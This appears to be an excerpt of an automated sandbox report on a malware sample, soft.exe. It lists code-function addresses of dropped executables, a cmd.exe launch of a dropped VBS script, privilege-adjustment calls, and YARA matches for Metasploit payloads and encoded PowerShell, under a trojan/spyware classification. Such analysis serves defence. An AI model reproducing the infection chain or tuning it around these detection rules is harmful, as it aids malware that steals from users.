                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094D33B13_2_6094D33B
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6093B36813_2_6093B368
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096748C13_2_6096748C
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6093F42E13_2_6093F42E
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095447013_2_60954470
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_609615FA13_2_609615FA
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096A5EE13_2_6096A5EE
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096D6A413_2_6096D6A4
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_609606A813_2_609606A8
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6093265413_2_60932654
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095566513_2_60955665
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094B7DB13_2_6094B7DB
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6092F74D13_2_6092F74D
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096480713_2_60964807
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094E9BC13_2_6094E9BC
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6093792913_2_60937929
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6093FAD613_2_6093FAD6
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096DAE813_2_6096DAE8
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094DA3A13_2_6094DA3A
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60936B2713_2_60936B27
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60954CF613_2_60954CF6
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60950C6B13_2_60950C6B
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60966DF113_2_60966DF1
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60963D3513_2_60963D35
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60909E9C13_2_60909E9C
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60951E8613_2_60951E86
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60912E0B13_2_60912E0B
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60954FF813_2_60954FF8
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BB2A9013_2_02BB2A90
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BAD33F13_2_02BAD33F
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BABB0D13_2_02BABB0D
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02B9E09413_2_02B9E094
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BA70D013_2_02BA70D0
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BB268D13_2_02BB268D
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BAB61913_2_02BAB619
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BABF2513_2_02BABF25
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BA875A13_2_02BA875A
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BB0DC413_2_02BB0DC4
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E5D9014_2_00007FF7444E5D90
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E1D2814_2_00007FF7444E1D28
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E2DB414_2_00007FF7444E2DB4
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E6CA414_2_00007FF7444E6CA4
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E66C414_2_00007FF7444E66C4
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E40C414_2_00007FF7444E40C4
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E353014_2_00007FF7444E3530
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E1C0C14_2_00007FF7444E1C0C
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFAAC2620DD18_2_00007FFAAC2620DD
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041607C23_2_0041607C
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044A03023_2_0044A030
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044F0C023_2_0044F0C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041095E23_2_0041095E
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044617023_2_00446170
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041B10023_2_0041B100
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041318323_2_00413183
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040B99023_2_0040B990
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004312E023_2_004312E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041C37523_2_0041C375
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00437B2523_2_00437B25
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040F3F023_2_0040F3F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044640023_2_00446400
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044E55023_2_0044E550
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00411D6023_2_00411D60
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0042DD7023_2_0042DD70
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041BFAA23_2_0041BFAA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040104023_2_00401040
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044087023_2_00440870
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043500F23_2_0043500F
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044803223_2_00448032
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044D03823_2_0044D038
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004240E023_2_004240E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004470E023_2_004470E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004488E323_2_004488E3
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004308F023_2_004308F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0042509023_2_00425090
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0042116023_2_00421160
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041F16923_2_0041F169
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043197323_2_00431973
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004449FD23_2_004449FD
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044A98023_2_0044A980
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040C1A023_2_0040C1A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040C9A023_2_0040C9A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004381B423_2_004381B4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00408A5023_2_00408A50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041C74B23_2_0041C74B
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041FA6F23_2_0041FA6F
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00417A7023_2_00417A70
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00445A0023_2_00445A00
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044EA1023_2_0044EA10
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040A22023_2_0040A220
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041222B23_2_0041222B
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044DAF023_2_0044DAF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040EA9D23_2_0040EA9D
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0042A2B023_2_0042A2B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043334323_2_00433343
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043D34823_2_0043D348
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041D36123_2_0041D361
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00426B1023_2_00426B10
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00402B2023_2_00402B20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0042D3C723_2_0042D3C7
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043F3DA23_2_0043F3DA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004373DF23_2_004373DF
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043A3E023_2_0043A3E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004243F023_2_004243F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00443BFA23_2_00443BFA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00424BB023_2_00424BB0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040944023_2_00409440
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00423C4023_2_00423C40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00410C5023_2_00410C50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044745023_2_00447450
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00423C5723_2_00423C57
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00432C5823_2_00432C58
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00437C5F23_2_00437C5F
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040B41023_2_0040B410
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040AC2023_2_0040AC20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041E4C223_2_0041E4C2
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040C4D023_2_0040C4D0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00429CE023_2_00429CE0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0042BCE923_2_0042BCE9
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00437C5D23_2_00437C5D
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043FC9023_2_0043FC90
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043E4A923_2_0043E4A9
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00416CB723_2_00416CB7
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00407D5023_2_00407D50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044ED5023_2_0044ED50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043656023_2_00436560
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040352023_2_00403520
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044053023_2_00440530
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00424DC023_2_00424DC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004175D323_2_004175D3
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00436DF023_2_00436DF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00403EC023_2_00403EC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00408EC023_2_00408EC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004346F023_2_004346F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00414EF423_2_00414EF4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00439E9A23_2_00439E9A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00438F4423_2_00438F44
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041C74B23_2_0041C74B
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044D75023_2_0044D750
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043176023_2_00431760
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041DF2A23_2_0041DF2A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004207F023_2_004207F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040278023_2_00402780
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00438F8223_2_00438F82
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00438F9323_2_00438F93
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044DF9023_2_0044DF90
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004247A023_2_004247A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004047A223_2_004047A2
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004457A023_2_004457A0
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: String function: 02BB2A20 appears 134 times
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: String function: 02BA7770 appears 32 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0041B0F0 appears 116 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0040B210 appears 48 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00408C1C appears 45 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00406AD4 appears 45 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 0040596C appears 117 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00407904 appears 43 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00403400 appears 60 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00445E48 appears 45 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00457FC4 appears 77 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00457DB8 appears 102 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00434550 appears 32 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00403494 appears 85 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 004533B8 appears 98 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00446118 appears 58 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00403684 appears 229 times
                            Source: MnzBi21FK.exe.9.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 5908 bytes, 1 file, at 0x2c +A "67c2163c9db39.vbs", ID 1251, number 1, 1 datablock, 0x1503 compression
                            Source: UNIQ[1].file.9.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 5908 bytes, 1 file, at 0x2c +A "67c2163c9db39.vbs", ID 1251, number 1, 1 datablock, 0x1503 compression
                            Source: N7LnRW81Rfq.tmp.11.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                            Source: N7LnRW81Rfq.tmp.11.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Source: N7LnRW81Rfq.tmp.11.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                            Source: is-SDRVH.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                            Source: is-SDRVH.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Source: is-SDRVH.tmp.12.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                            Source: is-PEPS4.tmp.12.drStatic PE information: Number of sections : 19 > 10
                            Source: sqlite3.dll.13.drStatic PE information: Number of sections : 19 > 10
                            Source: MnzBi21FK.exe.9.drStatic PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST
                            Source: UNIQ[1].file.9.drStatic PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST
                            Source: soft.exe, 00000005.00000002.1724312184.000000000A004000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs soft.exe
                            Source: soft.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5236
                            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5236Jump to behavior
Source: 00000005.00000002.1724312184.000000000A03E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000005.00000002.1724312184.0000000009FAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000005.00000002.1724312184.0000000009F58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4704, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@34/49@5/9
Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe Code function: 13_2_02B9F8E0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,13_2_02B9F8E0
Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe Code function: 11_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,11_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,12_2_0045568C
Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe Code function: 14_2_00007FF7444E1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,14_2_00007FF7444E1C0C
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_00455EB4 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,12_2_00455EB4
Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe Code function: CreateServiceA,13_2_004021EC
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Code function: 12_2_0046E5B8 GetVersion,CoCreateInstance,12_2_0046E5B8
Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe Code function: 11_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,11_2_00409C34
Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe Code function: 13_2_00401C5C StartServiceCtrlDispatcherA,13_2_00401C5C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\success[1].htm
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5132:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6080:120:WilError_03
Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe File created: C:\Users\user~1\AppData\Local\Temp\is-IL2KP.tmp
Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c 67c2163c9db39.vbs
Source: soft.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\soft.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: ssdtoolbox.exe, ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
